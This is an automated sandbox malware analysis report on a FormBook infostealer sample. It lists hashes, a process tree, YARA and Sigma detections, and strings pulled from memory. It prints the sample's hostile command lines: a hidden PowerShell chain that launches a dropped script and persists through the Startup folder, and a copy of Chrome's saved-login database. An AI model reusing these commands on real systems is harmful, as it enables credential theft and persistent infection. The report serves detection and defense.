Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report f5cZJ0WC0H

Overview

General Information

Sample Name:f5cZJ0WC0H (renamed file extension from none to exe)
Analysis ID:323830
MD5:0e7d12ad28411f68d62d3d3f17382b98
SHA1:742c7b23f14ebe783cdef406b073c6e867266657
SHA256:0f26e91c2b802ec98ff2cc6269ad43f09f29e8827d2975f4e6514db0df14db6c
Tags:formbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
Sigma detected: Steal Google chrome login data
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
.NET source code contains potential unpacker
Binary contains a suspicious time stamp
Drops PE files to the startup folder
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses ipconfig to lookup or modify the Windows network settings
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • f5cZJ0WC0H.exe (PID: 6112 cmdline: 'C:\Users\user\Desktop\f5cZJ0WC0H.exe' MD5: 0E7D12AD28411F68D62D3D3F17382B98)
    • cmd.exe (PID: 4548 cmdline: cmd.exe /c timeout 5 & powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 5876 cmdline: timeout 5 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
      • powershell.exe (PID: 5972 cmdline: powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • wscript.exe (PID: 7028 cmdline: 'C:\Windows\System32\wscript.exe' C:\Users\user\AppData\Local\Temp\\863733.js MD5: 7075DD7B9BE8807FCA93ACD86F724884)
        • f5cZJ0WC0H.exe (PID: 1268 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe' MD5: 0E7D12AD28411F68D62D3D3F17382B98)
          • f5cZJ0WC0H.exe (PID: 6952 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe MD5: 0E7D12AD28411F68D62D3D3F17382B98)
            • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
              • help.exe (PID: 4724 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
                • cmd.exe (PID: 3884 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
                  • conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • autoconv.exe (PID: 5164 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
              • ipconfig.exe (PID: 5824 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
  • f5cZJ0WC0H.exe (PID: 6868 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe' MD5: 0E7D12AD28411F68D62D3D3F17382B98)
    • f5cZJ0WC0H.exe (PID: 852 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe MD5: 0E7D12AD28411F68D62D3D3F17382B98)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000017.00000002.387510478.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000017.00000002.387510478.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000017.00000002.387510478.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000018.00000002.501338482.0000000000500000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000018.00000002.501338482.0000000000500000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 49 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      23.2.f5cZJ0WC0H.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        23.2.f5cZJ0WC0H.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a6e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        23.2.f5cZJ0WC0H.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        21.2.f5cZJ0WC0H.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          21.2.f5cZJ0WC0H.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a6e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Steal Google chrome login dataShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\help.exe, ParentImage: C:\Windows\SysWOW64\help.exe, ParentProcessId: 4724, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 3884
          Sigma detected: WScript or CScript DropperShow sources
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (rule): Data: Command: 'C:\Windows\System32\wscript.exe' C:\Users\user\AppData\Local\Temp\\863733.js , CommandLine: 'C:\Windows\System32\wscript.exe' C:\Users\user\AppData\Local\Temp\\863733.js , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe', ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5972, ProcessCommandLine: 'C:\Windows\System32\wscript.exe' C:\Users\user\AppData\Local\Temp\\863733.js , ProcessId: 7028

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000017.00000002.387510478.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.501338482.0000000000500000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.247225412.00000000044D6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.504034660.00000000009B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.246128519.0000000004389000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.438245140.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.389389710.0000000001050000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.383962255.0000000003B52000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.383860155.0000000003AD6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.382240548.0000000003989000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.503765338.0000000000980000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.439648635.00000000004C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.368138298.0000000003896000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.368427184.0000000003913000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.388561440.0000000000B40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.367211386.0000000003749000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.438147328.0000000000C40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 23.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 21.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 21.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 23.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 23.2.f5cZJ0WC0H.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 21.2.f5cZJ0WC0H.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe:Zone.IdentifierJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 4x nop then pop edi21_2_00417D4B

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.98.99.30:80 -> 192.168.2.5:49733
          Source: unknownDNS traffic detected: queries for: g.msn.com
          Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: powershell.exe, 00000005.00000002.348999474.00000000064A3000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000005.00000002.340189999.0000000005583000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000005.00000002.340189999.0000000005583000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngd
          Source: powershell.exe, 00000005.00000002.339869504.0000000005441000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: powershell.exe, 00000005.00000002.340189999.0000000005583000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000005.00000002.340189999.0000000005583000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmld
          Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: help.exe, 00000018.00000002.509412019.0000000003389000.00000004.00000001.sdmpString found in binary or memory: http://www.procertinspections.com
          Source: help.exe, 00000018.00000002.509412019.0000000003389000.00000004.00000001.sdmpString found in binary or memory: http://www.procertinspections.com/zsh/
          Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: powershell.exe, 00000005.00000002.348999474.00000000064A3000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000005.00000002.348999474.00000000064A3000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000005.00000002.348999474.00000000064A3000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000005.00000002.340189999.0000000005583000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000005.00000002.340189999.0000000005583000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pesterd
          Source: powershell.exe, 00000005.00000002.341468263.00000000057B2000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000005.00000002.348999474.00000000064A3000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000017.00000002.387510478.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.501338482.0000000000500000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.247225412.00000000044D6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.504034660.00000000009B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.246128519.0000000004389000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.438245140.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.389389710.0000000001050000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.383962255.0000000003B52000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.383860155.0000000003AD6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.382240548.0000000003989000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.503765338.0000000000980000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.439648635.00000000004C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.368138298.0000000003896000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.368427184.0000000003913000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.388561440.0000000000B40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.367211386.0000000003749000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.438147328.0000000000C40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 23.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 21.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 21.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 23.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\help.exeDropped file: C:\Users\user\AppData\Roaming\7-NB1T71\7-Nlogri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\help.exeDropped file: C:\Users\user\AppData\Roaming\7-NB1T71\7-Nlogrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000017.00000002.387510478.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.387510478.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000018.00000002.501338482.0000000000500000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000018.00000002.501338482.0000000000500000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.247225412.00000000044D6000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.247225412.00000000044D6000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000018.00000002.504034660.00000000009B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000018.00000002.504034660.00000000009B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.246128519.0000000004389000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.246128519.0000000004389000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.438245140.0000000000C70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.438245140.0000000000C70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.389389710.0000000001050000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.389389710.0000000001050000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.383962255.0000000003B52000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.383962255.0000000003B52000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.383860155.0000000003AD6000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.383860155.0000000003AD6000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.382240548.0000000003989000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
